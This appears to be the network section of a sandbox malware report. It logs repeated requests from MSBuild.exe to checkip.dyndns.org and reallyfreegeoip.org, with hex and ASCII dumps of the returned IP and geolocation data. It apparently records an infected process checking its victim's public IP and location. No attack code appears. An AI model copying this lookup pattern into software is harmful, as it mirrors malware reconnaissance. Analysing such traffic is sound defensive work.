Sep 25, 2024 18:50:28.571722984 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 18:50:29.083614111 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7d246b18265ca64d8b2d7e6b83d0ae10 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49710	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:29.710875034 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 18:50:30.314979076 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9c9777691039a84a57a9d6485caa1fee Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:30.993423939 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 18:50:31.583887100 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2be9e4554b264461bee3ca7adeb35661 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49715	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:32.239438057 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 18:50:32.827362061 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7c9e56713b5205c2a6d5cf3385bd2253 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49719	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:33.487730026 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 18:50:35.050544977 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2e5e58a37ad08775e61a43a5938d3ae6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49722	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:35.710405111 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 18:50:39.297323942 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Wed, 25 Sep 2024 16:50:39 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 5f5fde12d0a866917fccf6345605cb29 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49727	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:39.517070055 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 18:50:42.078614950 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: faf00e6c2cea12e0256b96613bad7db6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:27 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 16:50:27 UTC	674	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35086 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwEgUjtitTROSfoT4xJ9il9p2K24fMcxnlr4wWB0UpZ1hJ5ycYFE2vDqnvWkC493%2FcoapKwtpu2KY1GqEuvEQhEKCz7%2B2Mkbm8Q3L3gte0DHbWlAsPyGgoTQf57U8DigyaSDZ93t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c8368ca5843a0-EWR
2024-09-25 16:50:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49707	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:28 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 16:50:28 UTC	676	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35087 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9HmY26FwG98ERtMUtE7kUJ5l4IgZcBnUp4D47Vx6iBC0GRjcHExbsW1Js%2FRQTixP%2FTUU2kaBZMseStsy0f1316JG7FJvsFTaXx%2F2k6GWDTpKCH8HVm6lRdz3yYAxxSwBlSKVmAu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c836eac274269-EWR
2024-09-25 16:50:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:29 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 16:50:29 UTC	682	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35088 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLQ57pKh9r25Q6Ta5elgjx%2FZ9wxg5jLOzV%2BxRaCojBK87PolVPqFjTmgGZVKTs7rBYvnuN98MFFJPwxS9R%2BFxhUzsXbhnyggh6jJz%2BGd0kBjKNsVyl%2FTrZt%2FjLuDu3JRkR44l1mm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c837728218c0b-EWR
2024-09-25 16:50:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49711	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 16:50:30 UTC	676	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35089 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulLCOO87GEVHOuy9cVTdzfNQX3Eu5fUKEbrcJN%2FdpENcNPXCrksNyZ4RIv3QwZFzbCBC5MKNGeVSPFnY%2FvnmDMIw6TkkIhvOwmTrxAvNPUR1usn8I%2FXtJBmkBfrVPNFOrKyGHKWQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c837efa1ec431-EWR
2024-09-25 16:50:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49713	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 16:50:32 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35091 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8SFMEW%2BpvEf19J4r6rrcIkc4Zwlx4i6PBNmZeH3lNgx%2Bl8OOWABcgTi8qbLYeU5f5FYlNUPcgthmD0vEm%2BtDge8TnREqH3FahRrVh26%2FIEod2yJklCKQtauvUn8CroILQ4wpp7u7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c83870c244374-EWR
2024-09-25 16:50:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49717	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 16:50:33 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35092 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PG2iH4cstHf681j0Q2ikB%2FAidj9C%2BCkpKMwQ278qMHDwNwsJJcWLd9x7LrV6JebB0ZmiQPZNl4fJOxAyFjmVZi9FYDKOtVA6wPkJdUQmMCDOInnFa7J%2Fb2jc58%2BnJ5MbiFanmssP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c838eda00423d-EWR
2024-09-25 16:50:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49721	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 16:50:35 UTC	706	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35094 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsiM6toJKgJaiwPD75SQlgNnMP2gWLbDplQBCjEgxPRa2DxrlkzGJ9go2WUA2ingy9Yu2Vzz98v0E%2BBzSOcgVpy1x5iucuVqKhYnEAOu%2FixrK41usPQXLCwjDHi0epoSwdwp4TCK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c839cad1517a1-EWR alt-svc: h3=":443"; ma=86400
